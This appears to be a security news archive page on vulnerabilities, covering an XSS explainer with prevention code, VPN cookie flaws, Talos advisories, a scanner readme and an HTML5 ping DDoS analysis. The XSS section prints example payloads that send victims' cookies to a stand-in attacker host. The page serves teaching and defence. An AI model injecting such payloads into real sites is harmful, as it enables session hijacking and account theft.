Category Archives: Vulnerability

The Cross-site Scripting (XSS) Vulnerability: Definition and Prevention

The Cross-Site Scripting vulnerability is one of the few vulnerabilities that has made it in every OWASP Top 10 list of most critical web application security risks released.


To understand the Cross-site Scripting vulnerability you first have to understand the basic concept of the Same Origin Policy (SOP), which forbids a web application from retrieving content from pages with another origin. Because access to cross-origin content is forbidden, random websites cannot read or modify data from your Facebook page or PayPal account while you are logged in to them.

SOP is one of the most important security principles in every web browser. For example the page https://example.com/index.html can access content from https://example.com/about.html while https://attacker.com/index.html cannot access content from https://example.com/about.html.

The Cross-site Scripting (XSS) Vulnerability

Cross-site Scripting, also known as XSS, is a way of bypassing the SOP concept in a vulnerable web application. Whenever HTML code is generated dynamically and user input is reflected on the page without being sanitized, an attacker can insert his own HTML code. The web browser will still render the attacker's code, since it appears to belong to the website it was injected into.

In such a case an attacker can easily insert JavaScript code that runs in the site's context. By doing so the attacker is able to access other pages on the same domain and can read data such as CSRF tokens or the cookies set by the site.

If the cookies, which typically contain the session identifier, can be read by client-side JavaScript code, the attacker can use them in his own browser and log in to the web application as the victim. If that does not work, the attacker can still read private information from the pages, such as CSRF tokens, and make requests on behalf of the user.

Different Types of Cross-Site Scripting Vulnerability

There are mainly three different types of Cross-site Scripting vulnerability: Stored, Reflected and DOM XSS. Below you can find a detailed technical explanation of each of them.

Stored Cross-site Scripting Vulnerability

A Stored Cross-site Scripting vulnerability occurs when the payload is saved, for example in a database, and is then executed whenever a user opens the affected page of the web application. Stored cross-site scripting is very dangerous for a number of reasons:

  • The payload is not visible for the browser's XSS filter
  • Users might accidentally trigger the payload simply by visiting the affected page, while a crafted URL or specific form inputs would be required to exploit reflected XSS.

Example of a Stored XSS

A stored XSS vulnerability can occur if the username on an online message board is not properly sanitized when it is printed on the page. In such a case an attacker can insert malicious code in the username field when registering a new user. When the username is reflected on the message board page, the HTML will look like this:

Username: user123<script>document.location='https://attacker.com/?cookie='+encodeURIComponent(document.cookie)</script>
Registered since: 2016

The above malicious JavaScript is triggered every time a user visits this forum section. It sends the message board cookies stored in the visitor's browser to the attacker, who then uses them to hijack the user's session. Stored XSS can be a very dangerous vulnerability since it can have the effect of a worm, especially when exploited on popular pages.

For example, imagine a message board or social media website with a public-facing page that is vulnerable to stored XSS, such as a user's profile page. If the attacker is able to place a malicious JavaScript payload that adds itself to the profile page of every visitor, the payload is executed every time someone opens an infected page and it spreads with exponential growth.

Reflected Cross-site Scripting (XSS) Vulnerability

A reflected XSS vulnerability occurs when user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This means that the attacker has to send a crafted malicious URL or POST form to the victim to deliver the payload, and the victim has to click the link. This kind of payload is also generally caught by the built-in XSS filters in users' browsers, such as Chrome, Internet Explorer or Edge.

Example of a Reflected XSS

As an example we will use the search functionality of a news website, which takes the user's input from the q parameter of the HTTP GET request, as in the example below:

https://example.com/news?q=data+breach

In the search results the website reflects the content of the query that the user searched for, such as:

You searched for "data breach":

If the search functionality is vulnerable to reflected cross-site scripting, the attacker can send the victim a malicious URL such as the one below:

https://example.com/news?q=<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>

Once the victim clicks on the malicious URL, the XSS attack is executed and the website displays the following:

You searched for "<script>document.location='https://attacker.com/log.php?c=' + document.cookie</script>":

The HTML source code that reflects the attacker's malicious code redirects the victim's browser to a website controlled by the attacker, passing the victim's current session cookies / session tokens for example.com as a GET parameter.

DOM Based Cross-Site Scripting Vulnerability

A DOM Based XSS vulnerability occurs in the DOM (Document Object Model), in client-side code, instead of in the server-generated HTML. Read DOM Based Cross-site Scripting (XSS) vulnerability for a detailed explanation of DOM XSS.

Impacts of the Cross-site Scripting Vulnerability

The impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from session hijacking of users to, when combined with a social engineering attack, disclosure of sensitive data, CSRF attacks and other security vulnerabilities. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account. Read about the apache.org JIRA incident for more information on how an XSS vulnerability was used in a successful attack that also led to code execution.

Preventing XSS Vulnerabilities

To prevent XSS vulnerabilities it is very important to apply context-dependent output encoding. In some cases it might be enough to encode the HTML special characters, such as the characters that open and close tags. In other cases a correctly applied URL encoding is necessary. Links should generally be disallowed if they don't begin with a whitelisted protocol such as http:// or https://, thus preventing the use of URI schemes such as javascript://.

Even though most modern web browsers have a built-in XSS filter, it should not be seen as an alternative to sanitization. Such filters cannot catch all kinds of cross-site scripting attacks, and they are deliberately not strict, so as not to produce false positives that would prevent some pages from loading correctly. A web browser's XSS filter should only be a "second line of defense"; its purpose is to minimise the impact of existing vulnerabilities.

Developers should not use blacklists, as there is a variety of bypasses for them. They should also avoid stripping dangerous functions and characters from the output: once the output is tampered with, the browsers' XSS filters can no longer recognize the dangerous payloads, which allows for possible bypasses. That being said, the only recommended prevention of XSS is the encoding mentioned above.
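The following Python is an added example, not code from the original post, showing what context-dependent output encoding looks like on the server side for the two cases the article uses: the reflected "You searched for" page and the message-board username. It contrasts the vulnerable string concatenation with encoding for the HTML body context, the attribute context, and the URL context (where only http:// and https:// links are allowed, so javascript: and similar schemes are rendered as plain text). The function names, ALLOWED_LINK_SCHEMES and the example.com URLs are assumptions made for the example.

```python
import html
from urllib.parse import quote, urlsplit

# Added example: server-side, context-dependent output encoding for the
# "You searched for" page and the message-board username from the article.
# Not code from the original post; the function names and the
# ALLOWED_LINK_SCHEMES list are assumptions made for the example.

ALLOWED_LINK_SCHEMES = {"http", "https"}


def render_search_vulnerable(q):
    """The vulnerable pattern: the query is concatenated straight into the
    HTML body, so any markup in q becomes markup on the page."""
    return f'<p>You searched for "{q}":</p>'


def render_search_safe(q):
    """HTML body context: escape &, <, >, " and ' so that the reflected value
    is displayed as text and never parsed as a tag."""
    return f'<p>You searched for "{html.escape(q, quote=True)}":</p>'


def render_username_safe(username):
    """HTML attribute context: the attribute must be quoted in the template and
    the value must have its quotes escaped, otherwise a quote character in the
    value would end the attribute early."""
    safe = html.escape(username, quote=True)
    return f'<span class="user" data-name="{safe}">{safe}</span>'


def safe_link(href, text):
    """URL context: only http:// and https:// links are allowed, matching the
    whitelist the article recommends. Anything else (javascript:, data:, a
    scheme-relative //host URL) is rendered as plain text rather than a link.
    urlsplit() lower-cases the scheme, so case tricks do not help."""
    parts = urlsplit(href.strip())
    if parts.scheme not in ALLOWED_LINK_SCHEMES:
        return html.escape(text, quote=True)
    return (f'<a href="{html.escape(parts.geturl(), quote=True)}">'
            f'{html.escape(text, quote=True)}</a>')


def search_url(q):
    """Building a URL from user input: percent-encode the value so it cannot
    add parameters, break out of the query string, or smuggle markup."""
    return "https://example.com/news?q=" + quote(q, safe="")


if __name__ == "__main__":
    # Constructed payload shaped like the article's reflected XSS example.
    payload = ("<script>document.location='https://attacker.com/log.php?c='"
               "+encodeURIComponent(document.cookie)</script>")
    print(render_search_vulnerable(payload))   # script tag reaches the page
    print(render_search_safe(payload))         # script tag shown as text
    print(render_username_safe('user123"><b>x</b>'))
    print(safe_link("javascript:alert(1)", "click me"))
    print(safe_link("https://example.com/about.html", "About"))
    print(search_url("data breach"))
```

The point of the split into separate functions is that one encoder does not fit every context: html.escape is correct inside the body and inside a quoted attribute, but it does nothing against a javascript: URL placed in an href, which is why safe_link checks the scheme first and search_url percent-encodes instead of HTML-encoding.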

Vulnerability Classification and Severity Table

Classification    ID / Severity
PCI v3.2          6.5.7
CAPEC             19
CWE               79
WASC              8
OWASP 2013        A3
OWASP 2017        A7
HIPAA             164.308(a)
CVSS:3.0          CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker        High

The post The Cross-site Scripting (XSS) Vulnerability: Definition and Prevention appeared first on Security Boulevard.

Drupal Releases Core CMS Updates to Patch Several Vulnerabilities

Drupal, the popular open-source content management system, has released security updates to address multiple "moderately critical" vulnerabilities in Drupal Core that could allow remote attackers to compromise the security of hundreds of thousands of websites. According to the advisories published today by the Drupal developers, all security vulnerabilities Drupal patched this month reside in

E Hacking News – Latest Hacker News and IT Security News: Chrome Utilized for iOS Vulnerability by a Threat Group to Bypass the Browser’s Built-In Pop-Up Blocker



eGobbler, a threat group, recently targeted iOS users in the U.S. and in various European Union countries through massive malvertising attacks over almost a week, using a Chrome for iOS vulnerability to sidestep the browser's built-in pop-up blocker.

The threat group used "8 individual campaigns and more than 30 fake creatives" during the push, with each fake ad campaign having a lifespan of between 24 and 48 hours.

According to the Confiant researchers who discovered and observed eGobbler's iOS-targeted attacks, approximately 500 million user sessions were exposed to this large-scale coordinated campaign pushing fake ads.


Confiant's researchers found that eGobbler's campaigns usually stay active for at most 48 hours, followed by brief periods of hibernation that end abruptly when the next attack begins.

Some campaigns were also seen to use landing pages hosted on .world domains that use pop-ups to hijack users' sessions and redirect the victims to malicious pages, a technique that serves the attackers for phishing as well as for dropping malware.

This campaign was not the first of its kind to explicitly target iOS users: in November 2018, Confiant observed another campaign, run by the ScamClub group, which managed to hijack approximately 300 million iOS user sessions and redirect them to adult content and gift card scams.

As Confiant said in their report, "This really was a standout campaign compared to the others that we track based not only on the unique payload, but the volumes as well."
They added that "With almost half a billion user sessions impacted, this is among the top three massive malvertising campaigns that we have seen in the last 18 months."




Naked Security – Sophos: Internet Explorer browser flaw threatens all Windows users

Nearly four years after it was replaced by Edge as Microsoft’s preferred Windows browser, researchers keep finding unpleasant security flaws in Internet Explorer (IE).




Banking Trojan Emotet Now Targets Legitimate Email Chains to Deploy Malware

The Emotet banking trojan has now evolved; it would seem it has taken on new tactics in the form of

Banking Trojan Emotet Now Targets Legitimate Email Chains to Deploy Malware on Latest Hacking News.

Bad security hygiene still a major risk for enterprise IT networks

Unpatched vulnerabilities, along with growing network and application complexity pose an ongoing security risk which could threaten the security of enterprise IT networks. Analyzing the biggest security findings over the past year, Keysight has released the third annual security report from Ixia’s Application and Threat Intelligence (ATI) Research Center. Humans are the weakest link In 2018, Ixia detected 662,618 phishing pages in the wild, and 8,546,295 pages hosting or infected by malware – so a … More

The post Bad security hygiene still a major risk for enterprise IT networks appeared first on Help Net Security.

E Hacking News – Latest Hacker News and IT Security News: Multiple VPN Applications Allow Attackers to Sidestep Authentication; Assists in Taking Control of Affected Systems




Enterprise VPN applications from Palo Alto Networks, Pulse Secure, Cisco and F5 Networks reportedly store authentication and session cookies insecurely, according to a DHS/CISA alert and a vulnerability note issued by CERT/CC, potentially enabling attackers to bypass authentication.

The alert, issued on the 14th of April by the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA), additionally states that an "attacker could exploit this vulnerability to take control of an affected system."

As described in the Common Weakness Enumeration database under CWE-311, an application that fails to "encrypt sensitive or critical information before storage or transmission" could allow a would-be attacker to intercept traffic, read it and inject malicious code or data to carry out a Man-in-the-Middle (MitM) attack.

CERT/CC says:

The following products and versions store the cookie insecurely in log files:
- Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS (CVE-2019-1573)
- Pulse Secure Connect Secure prior to 8.1R14, 8.2, 8.3R6, and 9.0R2

The following products and versions store the cookie insecurely in memory:
- Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS (CVE-2019-1573)
- Pulse Secure Connect Secure prior to 8.1R14, 8.2, 8.3R6, and 9.0R2
- Cisco AnyConnect 4.7.x and prior

According to the note, "It is likely that this configuration is generic to additional VPN applications," which suggests that many VPN applications from a total of 237 vendors could be affected by this information disclosure vulnerability.

Additionally, the vulnerability note, written by Carnegie Mellon University's Madison Oliver, says: "If an attacker has persistent access to a VPN user's endpoint or exfiltrates the cookie using other methods, they can replay the session and bypass other authentication methods. An attacker would then have access to the same applications that the user does through their VPN session."

While VPN applications from Check Point Software Technologies and pfSense were found not to be vulnerable, Cisco and Pulse Secure have not yet issued any information on this vulnerability. Palo Alto Networks has since published a security advisory with additional information on this information disclosure vulnerability, tracked as CVE-2019-1573.

F5 Networks, on the other hand, while being "aware of the insecure memory storage since 2013", chose not to fix it and offers the following mitigation: "To mitigate this vulnerability, you can use a one-time password or two-factor authentication instead of password-based authentication."




Vulnerability Spotlight: Denial of service in VMWare Workstation 15


Piotr Bania of Cisco Talos discovered this vulnerability.

Executive summary

VMware Workstation 15 contains an exploitable denial-of-service vulnerability. Workstation allows users to run multiple operating systems on a Linux or Windows PC. An attacker could trigger this particular vulnerability from VMware guest user mode to cause a denial-of-service condition through an out-of-bounds read. This vulnerability only affects Windows machines.

In accordance with our coordinated disclosure policy, Cisco Talos worked with VMware to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

VMware Workstation 15 vertex shader functionality denial-of-service vulnerability (TALOS-2018-0762/CVE-2019-5516)

An exploitable denial-of-service vulnerability exists in VMware Workstation 15. A specially crafted vertex shader can cause denial-of-service issues. An attacker can provide a specially crafted shader file to trigger this vulnerability. The vulnerability can be triggered from a VMware guest, affects the VMware host, and leads to a crash of the vmware-vmx.exe process on the host.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that VMware Workstation 15 (15.0.2 build-10952284) with Windows 10 x64 as the guest VM is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49045, 49046

Vulnerability Spotlight: Multiple vulnerabilities in Shimo VPN’s helper tool



Discovered by Tyler Bohan of Cisco Talos.

Overview

Cisco Talos is disclosing a series of vulnerabilities found in the Shimo VPN Helper Tool. Shimo VPN is a popular VPN client for MacOS that can be used to connect multiple VPN accounts to one application. These specific vulnerabilities were found in the “helper tool,” a feature that Shimo VPN uses to accomplish some of its privileged work.

These vulnerabilities are being released without a patch, per our disclosure policy, after repeated attempts were made to communicate with the vendor.

Vulnerability Details

TALOS-2018-0673

TALOS-2018-0673/CVE-2018-4004 is a privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the disconnectService function. The vulnerability requires local access to the machine but could allow a non-root user to kill privileged processes on the system. 

Detailed vulnerability information can be found here.

TALOS-2018-0674

TALOS-2018-0674/CVE-2018-4005 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the configureRoutingWithCommand function. The vulnerability requires local access to the machine but could allow an attacker to escalate their privileges to root.  

Detailed vulnerability information can be found here.

TALOS-2018-0675

TALOS-2018-0675 / CVE-2018-4006 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the writeConfig functionality. The vulnerability requires local access to the machine but could allow an attacker to escalate their privileges to root. 

Detailed vulnerability information can be found here.

TALOS-2018-0676

TALOS-2018-0676 / CVE-2018-4007 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the deleteConfig functionality. The vulnerability requires local access to the machine but could allow an attacker to delete any protected file on the system. 

Detailed vulnerability information can be found here.

TALOS-2018-0677

TALOS-2018-0677 / CVE-2018-4008 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service, specifically the RunVpncScript command. The vulnerability requires local access to the machine. The command takes a user-supplied script argument and executes it under root context.  

Detailed vulnerability information can be found here.

TALOS-2018-0678

TALOS-2018-0678 / CVE-2018-4009 is an exploitable privilege escalation vulnerability that resides in the Shimo VPN helper service due to improper validation of code signing.  The vulnerability requires local access to the machine but could allow an attacker to escalate their privileges to root.  

Detailed vulnerability information can be found here.

Known Vulnerable Versions

Shimo VPN 4.1.5.1




Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 47801 - 47804

W12Scan – A Simple Asset Discovery Engine For Cybersecurity


W12scan is a network asset discovery engine that can automatically aggregate related assets for analysis and use.

This repository is the web front end; the scanning component lives at w12scan-client.

Design
Built on python3 + django + elasticsearch + redis; scan targets are added through the web RESTful API.
🚀 A simple asset discovery engine for cybersecurity (网络资产发现引擎).

Feature

Web
  • Powerful search syntax
    • Search for cms, service, titles, country regions, etc., to quickly find relevant targets.
      • title="abc" # Search in the title
      • header="abc" # Search in the HTTP header
      • body="123" # Search in the body text
      • url="*.baidu.com" # Search for subdomains of baidu.com
      • ip='1.1.1.1' # Search by IP; '192.168.1.0/24' and '192.168.1.*' are also supported
      • port='80' # Search by port
      • app='nginx' # Search by application
      • country='cn' # Search by country
      • service='mysql' # Search by service
      • bug='xx' # Search by vulnerability
  • Custom assets
    • By defining the domain names or IP assets that belong to your company, w12scan will automatically find the corresponding asset targets. When you browse such a target, a prominent badge reminds you of the target's ownership.
  • Automatic association
    • Open the target details. If the target is an IP, all domain names on that IP and on its class C range are automatically associated. If the target is a domain name, neighbouring hosts, the class C range and subdomains are automatically associated.
  • Multi-node management
    • The web side checks the status of each node every few minutes; you can see the number of scans per node and each node's scan log.
  • Task RESTful API
    • Provides an interface for adding tasks; you can add them from the web side or integrate it into any software.
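The search syntax above is user-controlled input that ends up in an Elasticsearch query, so the place to validate it is a small parser that only admits the documented fields and well-formed values. The following Python is an added example of such a parser, not w12scan's own code: the Elasticsearch-style query shape, the mapping of ip/port/url to term, wildcard and match_phrase clauses, and the helper names are assumptions made for the example. It covers all the listed fields, including the CIDR and 192.168.1.* forms of the ip field.

```python
import ipaddress
import re

# Added example: a parser for the search syntax listed above that turns a
# query string into an Elasticsearch-style bool query. Not w12scan's own
# code; the query shape, the ip/port/url field mappings and the helper
# names are assumptions made for the example.

KNOWN_FIELDS = {"title", "header", "body", "url", "ip", "port",
                "app", "country", "service", "bug"}
# key = "value" | key = 'value' | key = bare_value
TOKEN_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|(\S+))""")
# normalise curly quotes pasted from documents or chat clients
QUOTE_MAP = str.maketrans({"\u201c": '"', "\u201d": '"',
                           "\u2018": "'", "\u2019": "'"})


def _ip_clause(value):
    """Accept a single address, a CIDR block, or a 192.168.1.* wildcard, and
    reject anything else before it reaches the search backend."""
    if value.endswith(".*"):
        octets = value[:-2].split(".")
        if len(octets) != 3 or not all(o.isdigit() for o in octets):
            raise ValueError(f"unsupported ip wildcard: {value}")
        value = ".".join(octets + ["0"]) + "/24"
    net = ipaddress.ip_network(value, strict=False)   # ValueError on garbage
    term = str(net) if net.num_addresses > 1 else str(net.network_address)
    return {"term": {"ip": term}}


def _clause(field, value):
    if field == "ip":
        return _ip_clause(value)
    if field == "port":
        if not value.isdigit() or not 0 < int(value) < 65536:
            raise ValueError(f"bad port: {value}")
        return {"term": {"port": int(value)}}
    if field == "url" and value.startswith("*."):
        return {"wildcard": {"url": value}}          # subdomain search
    if field in ("title", "header", "body"):
        return {"match_phrase": {field: value}}      # free-text fields
    return {"term": {field: value.lower()}}          # keyword fields


def parse_query(text):
    """Parse e.g. title="abc" ip='192.168.1.*' port='80' into a bool query.
    Raises ValueError on unknown fields or malformed values."""
    text = text.translate(QUOTE_MAP)
    must = []
    for m in TOKEN_RE.finditer(text):
        field = m.group(1).lower()
        if field not in KNOWN_FIELDS:
            raise ValueError(f"unknown field: {field}")
        value = next(g for g in m.groups()[1:] if g is not None)
        must.append(_clause(field, value))
    if not must:
        raise ValueError("no search terms")
    return {"query": {"bool": {"must": must}}}


def is_valid_query(text):
    """Convenience wrapper for input validation at the API boundary."""
    try:
        parse_query(text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(parse_query("title=\"abc\" ip='192.168.1.*' port='80'"))
    print(parse_query("url = \u201c*.baidu.com\u201d"))
    print(is_valid_query("ip='not-an-ip'"), is_valid_query("secret='x'"))
```

Because every value is rebuilt from parsed fields rather than spliced into a query string, a malformed IP, an out-of-range port or an undocumented field name is rejected with a ValueError instead of reaching Elasticsearch.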

Scanning end
  • PoC
    • Fetches the latest PoC scripts online via airbug.
  • Built-in scan scripts
    • Common vulnerability verification services are built into the scanner.
  • Scanning
    • Uses masscan, nmap, wappalyzer and w11scan.
  • Easy to distribute
    • This was taken into account in the design of the program architecture. It is very easy to distribute and run the scan terminal directly on another machine; it can also be distributed using docker or the celery service.

Installation
Quickly build an environment with docker
git clone https://github.com/boy-hack/w12scan
cd w12scan
docker-compose up -d
Wait a while to visit http://127.0.0.1:8000

Telegram Group
Telegram Group:https://t.me/joinchat/MZ16xA9dfmJCYm4kbv15nA


Apache Tomcat Patches Important Remote Code Execution Flaw

The Apache Software Foundation (ASF) has released new versions of its Tomcat application server to address an important security vulnerability that could allow a remote attacker to execute malicious code and take control of an affected server. Developed by ASF, Apache Tomcat is an open source web server and servlet system, which uses several Java EE specifications such as Java Servlet,

Enterprise VPN apps store authentication and session cookies insecurely

CVE-2019-1573, a flaw that makes VPN applications store the authentication and/or session cookies insecurely (i.e. unencrypted) in memory and/or log files, affects a yet to be determined number of enterprise Virtual Private Network (VPN) applications. “If an attacker has persistent access to a VPN user’s endpoint or exfiltrates the cookie using other methods, they can replay the session and bypass other authentication methods,” Carnegie Mellon University’s CERT Coordination Center (CERT/CC) explained. “An attacker would then … More

The post Enterprise VPN apps store authentication and session cookies insecurely appeared first on Help Net Security.

Intel Patches Vulnerabilities In Four Different Products

Alongside Adobe patches and Microsoft Patch Tuesday updates, Intel has also released security updates for different products patching vulnerabilities posing

Intel Patches Vulnerabilities In Four Different Products on Latest Hacking News.

Microsoft April Patch Tuesday Also Addresses Two Zero-Day Bugs With Numerous Others

Microsoft April Patch Tuesday updates are out with numerous bug fixes. Apart from the other vulnerabilities, Microsoft has also patched

Microsoft April Patch Tuesday Also Addresses Two Zero-Day Bugs With Numerous Others on Latest Hacking News.

The Ping is the Thing: Popular HTML5 Feature Used to Trick Chinese Mobile Users into Joining Latest DDoS Attack

DDoS attacks have always been a major threat to network infrastructure and web applications.

Attackers are always creating new ways to exploit legitimate services for malicious purposes, forcing us to constantly research DDoS attacks in our CDN to build advanced mitigations.

We recently investigated a DDoS attack which was generated mainly from users in Asia. In this case, attackers used a common HTML5 attribute, the <a> tag ping, to trick these users into unwittingly participating in a major DDoS attack that flooded one web site with approximately 70 million requests in four hours.

Rather than a vulnerability, the attack relied on turning a legitimate feature into an attack tool. Also, almost all of the users enlisted in the attack were mobile users of the QQBrowser developed by the Chinese tech giant Tencent and used almost exclusively by Chinese speakers. Though it should be noted that this attack could have involved users of any web browser and that recent news could ensure that these attacks continue to grow — and we’ll explain why later in the article.

How They Did It

Ping is an attribute in HTML5 that specifies a list of URLs to be notified if the user follows a hyperlink. When the user clicks on the hyperlink, a POST request with the body "ping" is sent to the URLs specified in the attribute. The request also includes the headers "Ping-From" and "Ping-To" and a "text/ping" content type.

This attribute is useful for website owners to monitor/track clicks on a link. Read more here.

A simple HTML page containing a link with “ping” attribute
A POST request with the “ping” body

Notification services using ping are not new. The Pingback feature in the popular WordPress CMS notifies a web site owner if a link is clicked. Attackers have used Pingbacks to conduct DDoS attacks by sending millions of requests to vulnerable WordPress instances that are then forced to “reflect” the pingback requests onto the targeted web site.

Besides using the HTML5 ping, this DDoS attack also enlisted mostly mobile users from the same part of the world. While we’ve observed mobile browser-based attacks before, a DDoS attack mostly using the same mobile browser and from the same region is very uncommon.

About 4,000 user IPs were enlisted in the attack, with a significant percentage from China. They generated a peak 7,500 Requests per Second (RPS) during the 4 hour attack, producing an overall 70 million requests.

Diving into the logs to understand the attack, we noticed that all the malicious requests contained the HTTP Headers “Ping-From” and “Ping-To”. This was the first time we had seen a DDoS attack that utilized the <a> tag ping attribute.

Both the Ping-From and Ping-To values referred to the URL “http://booc.gz.bcebos.com/you.html”.

A sample of the requests that were generated by the DDoS attack

This suspicious URL contains a very simple HTML page with two external JavaScript files: “ou.js” and “yo.js”.

“http://booc.gz.bcebos.com/you.html” source code

“ou.js” had a JavaScript array containing URLs — the targets of the DDoS attack.

“OU.JS” JavaScript source code

“yo.js” had a function which randomly selects a target from the array and creates a <a> tag with “ping” attribute pointing to the target URL.

Every second, an <a> tag was created and clicked programmatically, causing a “ping” request to be sent to the target website.

Legitimate users who were tricked into visiting this page unwittingly participated in a DDoS attack. The pings continue to be generated for as long as the user stays on the page.

“yo.js” JavaScript source code

The question is: How did the mastermind keep users on this web site in order to keep triggering the ping requests and maintain the ferocious DDoS attack?

We noticed that the User-Agent in the requests is associated with the popular Chinese chat app, WeChat. WeChat opens links in messages using the device's default mobile browser, and as QQBrowser is very popular in China, many users pick it as the default browser for their smartphone.

Our theory is that social engineering combined with malvertising (malicious advertising) tricked unsuspecting WeChat users into opening the page in their browser. Here is one possible scenario:

  1. The attacker injects a malicious advertisement that loads the page hosting the ping script
  2. A link to the legitimate website carrying the malicious ad in an iframe is posted to a large WeChat group chat
  3. Legitimate users visit the website with the malicious ad
  4. The JavaScript code executes, creating a link with the “ping” attribute and clicking it on the user's behalf
  5. An HTTP ping request is generated and sent to the target domain from the legitimate user's browser

Final Words

While QQBrowser was overwhelmingly used in this DDoS attack because of its popularity with WeChat users, other web browsers can be exploited by the same ping technique. Worse, browser makers are taking steps that make it harder for users to turn off the ping feature in their browser, which is what would let them avoid being enlisted in such an attack.

According to an article earlier this week in Bleeping Computer tech news site, newer versions of Google Chrome, Apple’s Safari and Opera no longer let you disable hyperlink auditing, aka pings. This is a concern for web architects and security pros worried about this method of launching DDoS attacks spreading.

Fortunately, web site and application operators have some control. If you are not expecting or do not need to receive ping requests to your Web server, block any Web requests that contain “Ping-To” and/or “Ping-From” HTTP headers on the edge devices (Firewall, WAF, etc.). This will stop the ping requests from ever hitting your server. (Note: Imperva DDoS Protection is already updated to prevent ping functionality abuse targeted at your sites.)
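The filter described above, as an added example that is not part of the original post or of any Imperva product: a WSGI middleware that refuses hyperlink-auditing pings before they reach the application, matching on the Ping-From / Ping-To headers or the text/ping content type that a browser sets on these requests. The application, the allow-listed path and the sample requests are constructed for the demo; the Ping-From value is the URL named in the article, the Ping-To target is a placeholder.

```python
"""Reject <a ping> notifications at the application edge (added example, not the post's code)."""

# WSGI spelling of the Ping-From / Ping-To request headers a browser sends with a ping.
PING_HEADERS = ("HTTP_PING_FROM", "HTTP_PING_TO")


def is_hyperlink_audit_ping(environ):
    """True if the request looks like an <a ping> notification rather than a real POST.

    Any one marker is enough: either Ping-* header, or a text/ping content type
    (parameters such as ';charset=' are ignored), so a client that drops one
    header is still caught.
    """
    if any(h in environ for h in PING_HEADERS):
        return True
    ctype = environ.get("CONTENT_TYPE", "")
    return ctype.split(";")[0].strip().lower() == "text/ping"


class BlockPingMiddleware:
    """Wrap a WSGI app; answer 403 to pings except on explicitly allowed paths."""

    def __init__(self, app, allow_paths=()):
        self.app = app
        self.allow_paths = set(allow_paths)  # e.g. your own click-tracking endpoint

    def __call__(self, environ, start_response):
        if environ.get("PATH_INFO") not in self.allow_paths and is_hyperlink_audit_ping(environ):
            body = b"ping requests are not accepted\n"
            start_response("403 Forbidden", [("Content-Type", "text/plain"),
                                             ("Content-Length", str(len(body)))])
            return [body]
        return self.app(environ, start_response)


def hello_app(environ, start_response):
    """Stand-in for the protected application (constructed)."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"hello\n"]


app = BlockPingMiddleware(hello_app, allow_paths={"/click-tracker"})

# Constructed sample requests modelled on the headers described in the article.
PING_REQUEST = {
    "REQUEST_METHOD": "POST",
    "PATH_INFO": "/",
    "CONTENT_TYPE": "text/ping",
    "HTTP_PING_FROM": "http://booc.gz.bcebos.com/you.html",
    "HTTP_PING_TO": "http://victim.example/",  # placeholder target
}
NORMAL_REQUEST = {"REQUEST_METHOD": "GET", "PATH_INFO": "/"}


def run(environ):
    """Drive the stack without a server; return (status line, response body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], body


if __name__ == "__main__":
    print(run(PING_REQUEST))    # ('403 Forbidden', b'ping requests are not accepted\n')
    print(run(NORMAL_REQUEST))  # ('200 OK', b'hello\n')
```

The same three markers are what to key on in a WAF or reverse-proxy rule; blocking earlier, at the edge, is preferable because it keeps the requests off the application servers entirely.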

Application DDoS attacks are here to stay and will continue to evolve at incredible rates. Attackers are always finding new and creative ways to abuse legitimate services for malicious purposes. At Imperva, we are dedicated to detecting and combating these threats on your behalf.

The post The Ping is the Thing: Popular HTML5 Feature Used to Trick Chinese Mobile Users into Joining Latest DDoS Attack appeared first on Blog.

WPA3 design flaws affect security of new Wi-Fi standard

Researchers have discovered a number of design flaws affecting the security of the recently introduced WPA3 data transmission protocol. Collectively dubbed Dragonblood (because they affect WPA3’s Dragonfly handshake), they can be exploited to mount a DoS attack against a vulnerable access point or, more worryingly, to recover the password of a Wi-Fi network. “Attackers can then read information that WPA3 was assumed to safely encrypt. This can for example be abused to steal sensitive information … More

The post WPA3 design flaws affect security of new Wi-Fi standard appeared first on Help Net Security.

Mainframe security is top priority for 85% of IT pros yet few are adequately protecting their systems

While 85 percent of companies say mainframe security is a top priority, just 33 percent always or often make mainframe decisions based on security. The “Don’t Let Mainframe Security Complacency Leave Your Critical Customer Data At Risk” study commissioned by Key Resources and conducted by Forrester Consulting, surveyed 225 IT management and security decision makers at North American companies with $500 million or more in annual revenue. “Despite widespread awareness concerning the stakes, enterprises simply … More

The post Mainframe security is top priority for 85% of IT pros yet few are adequately protecting their systems appeared first on Help Net Security.

Security Flaws in WPA3 Protocol Let Attackers Hack WiFi Password

🔥 Breaking — It has been just under a year since the launch of the next-generation Wi-Fi security standard WPA3, and researchers have unveiled several serious vulnerabilities in the wireless security protocol that could allow attackers to recover the password of a Wi-Fi network. WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced

Update now! Here’s the April Patch Tuesday roundup

